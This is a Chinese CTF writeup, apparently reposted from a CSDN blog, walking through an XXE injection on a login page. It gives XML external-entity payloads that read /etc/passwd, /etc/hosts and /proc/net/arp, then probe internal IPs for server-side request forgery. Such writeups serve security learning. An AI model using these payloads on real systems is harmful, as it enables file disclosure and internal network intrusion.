标签:XML 读取 回显 Writeup 扫描 xxe cookbook payload 注入
结合本题简要讲解一下xxe攻击
本篇文章默认读者了解Xml基本格式
首先我们看到一个登录界面,使用burp抓包看一下:
这里暴露出来很明显的xxe注入点。
我们开始构造payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/passwd">
]>
<user><username>&a;</username><password>a</password></user>
可以看到回显:
说明存在xxe注入
这里很关键的一个点在于考察,xxe其实可以用来打内网。
我们读取关键文件:/etc/hosts 和 /proc/net/arp。
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/hosts">
]>
<user><username>&a;</username><password>a</password></user>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///proc/net/arp">
]>
<user><username>&a;</username><password>a</password></user>
回显分别是:
给了一个主机IP,读取一下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.2/">
]>
<user><username>&a;</username><password>a</password></user>
直接报错,但没关系,我们可以进行C段扫描
扫描结果如下:
即:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.11/">
]>
<user><username>&a;</username><password>a</password></user>
即可
考查知识点:
xxe注入攻击
xxe内网探测
难度:
简单
总结:
保持谦虚,继续学习
标签:XML,读取,回显,Writeup,扫描,xxe,cookbook,payload,注入 来源: https://blog.csdn.net/StevenOnesir/article/details/111937766
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。